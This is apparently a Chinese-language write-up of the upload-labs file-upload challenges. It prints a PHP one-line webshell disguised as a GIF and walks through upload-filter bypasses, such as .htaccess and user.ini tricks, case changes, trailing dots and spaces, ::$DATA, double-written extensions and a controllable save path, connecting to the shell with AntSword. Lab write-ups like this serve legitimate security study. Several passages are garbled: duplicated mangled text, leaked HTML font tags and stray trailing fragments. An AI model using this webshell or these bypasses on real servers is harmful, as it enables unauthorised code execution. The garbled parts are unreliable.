前端校验绕过:pass 01 两种思路:1.通过抓包,修改后缀 2.前端禁用js绕过前端后缀检验 首先写一个木马,改为图片格式GIF89a<?php eval($_POST['cmd'])?>抓包之后改为PHP格式: 使用蚁剑连接木马,第一次尝试一直是返回数据为空,原因是没有链接到木马,于是寻找木马地址,在抓包返回的页面里,查看js源码得到木马地址, 前端绕过:pass 02if (($_FILES['upload_file']['type'] == 'image/jpeg') || ($_FILES['upload_file']['type'] == 'image/png') || ($_FILES['upload_file']['type'] == 'image/gif')) ,因此做法同第一题所述方法一致,不再演示: 前端后缀名绕过:pass 03: pass 04:通过htacess文件使得png文件被解析为PHP文件: 首先上传木马,通过bp修改后缀,上传图片马 上传htacess配置文件,同样首先是将png后缀改为正常后缀,返回,使用蚁剑 链接木马得到: pass 05:大小写绕过 可以看到这道题的源码里面过滤了很多组合,但是没有过过滤纯大写组合,于是可以通过PHP后缀来绕过: pass 06:空格绕过: 这里将大小写过滤了,那就不能通过大小写过滤了, pass 07:.绕过过滤 pass 08:::$DATA 拓展名绕过 分析代码,发现少了一行:$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA,由于这个::DATA是一个特殊字段,通常可以通过添加在文件拓展名后面,绕过对文件拓展名的检验:‘∗∗在windows环境下,不光会自动去除文件末尾的点和空格,同时(::DATA是一个特殊字段,通常可以通过添加在文件拓展名后面,绕过对文件拓展名的检验:`**在windows环境下,不光会自动去除文件末尾的点和空格,同时(:: D A T A 是一个特殊字段,通常可以通过添加在文件拓展名后面,绕过对文件拓展名的检验: ‘ ∗ ∗ 在 w in d o w s 环境下,不光会自动去除文件末尾的点和空格,同时 ( :: pass 09:代码审计 PHP. . pass 10: 核心漏洞 pass 11: 漏洞描述:白名单过滤,文件保存目录可控 核心代码
if ( isset ( $_POST [ 'submit' ] ) ) { $ext_arr = array ( 'jpg' , 'png' , 'gif' ) ; $file_ext = substr ( $_FILES [ 'upload_file' ] [ 'name' ] , strrpos ( $_FILES [ 'upload_file' ] [ 'name' ] , "." ) + 1 ) ; if ( in_array ( $file_ext , $ext_arr ) ) { $temp_file = $_FILES [ 'upload_file' ] [ 'tmp_name' ] ; $img_path = $_GET [ 'save_path' ] . "/" . rand ( 10 , 99 ) . date ( "YmdHis" ) . "." . $file_ext ; if ( move_uploaded_file ( $temp_file , $img_path ) ) { $is_upload = true ; } else { $msg = '上传出错!' ; }
2. 逐句解析:`<font style="color:rgb(35, 41, 48);background-color:rgb(250, 250, 250);">$ext_arr</font><font style="color:rgb(225, 0, 35);background-color:rgb(250, 250, 250);">=</font><font style="color:rgb(215, 58, 73);background-color:rgb(250, 250, 250);">array</font><font style="color:rgb(38, 38, 38);background-color:rgb(250, 250, 250);">(</font><font style="color:rgb(102, 153, 0);background-color:rgb(250, 250, 250);">'jpg'</font><font style="color:rgb(38, 38, 38);background-color:rgb(250, 250, 250);">,</font><font style="color:rgb(102, 153, 0);background-color:rgb(250, 250, 250);">'png'</font><font style="color:rgb(38, 38, 38);background-color:rgb(250, 250, 250);">,</font><font style="color:rgb(102, 153, 0);background-color:rgb(250, 250, 250);">'gif'</font><font style="color:rgb(38, 38, 38);background-color:rgb(250, 250, 250);">);</font>`<font style="color:rgb(35, 41, 48);background-color:rgb(250, 250, 250);">这里设置白名单,表示后缀允许的范围,</font>`<font style="color:rgb(35, 41, 48);background-color:rgb(250, 250, 250);">$file_ext</font><font style="color:rgb(225, 0, 35);background-color:rgb(250, 250, 250);">=</font><font style="color:rgb(35, 41, 48);background-color:rgb(250, 250, 250);">substr</font><font style="color:rgb(38, 38, 38);background-color:rgb(250, 250, 250);">(</font><font style="color:rgb(35, 41, 48);background-color:rgb(250, 250, 250);">$_FILES</font><font style="color:rgb(38, 38, 38);background-color:rgb(250, 250, 250);">[</font><font style="color:rgb(102, 153, 0);background-color:rgb(250, 250, 250);">'upload_file'</font><fon
连接成功可以进入后台:
后台:(后面不再显示)
通过bp抓包,将后缀改为PHP,于是可以看到成功上传,但是这里的地址注意,后端重新改写了文件的地址,要通过查看文件内容查看:
通过蚁剑进行连接:
于是想想其他方法,试试user.ini 文件:先上传一个user.ini文件修改后缀png为正常后缀在,上传一个图片马:
接下来查看上传图片马的位置:
通过蚁剑进行访问:这里没有成功,也就跟换方法,查看这一关的代码与上一关进行对比,发现少了一个去空格处理,那么我们就可以通过在文件后缀名添加空格进行解决:(不要直接修改文件后缀名,系统会自动去除,要在bp里面去除):
后面通过蚁剑连接即可
观察源码可以发现,这里没有对点号进行删除,那么只需要在文件末尾加点号即可绕过:
进入后台:
没有:
之后连接直接去除后缀即可:
由于这里只过滤一次点号,那么就可以使用两个.来进行绕过:由于删除.之后,还会对点号后的后缀内容进行检验,于是我们在最后一个添加的点号那里进行添加空格,再加一个点号就可以绕过:于是将bp抓包,后缀修改为:
后面蚁剑连接即可
这里就可以通过双写绕过:于是可以通过bp修改后缀为pphphp,得到10.php:
蚁剑连接:
)
 完结篇!!!)
)
RT-THREAD版)
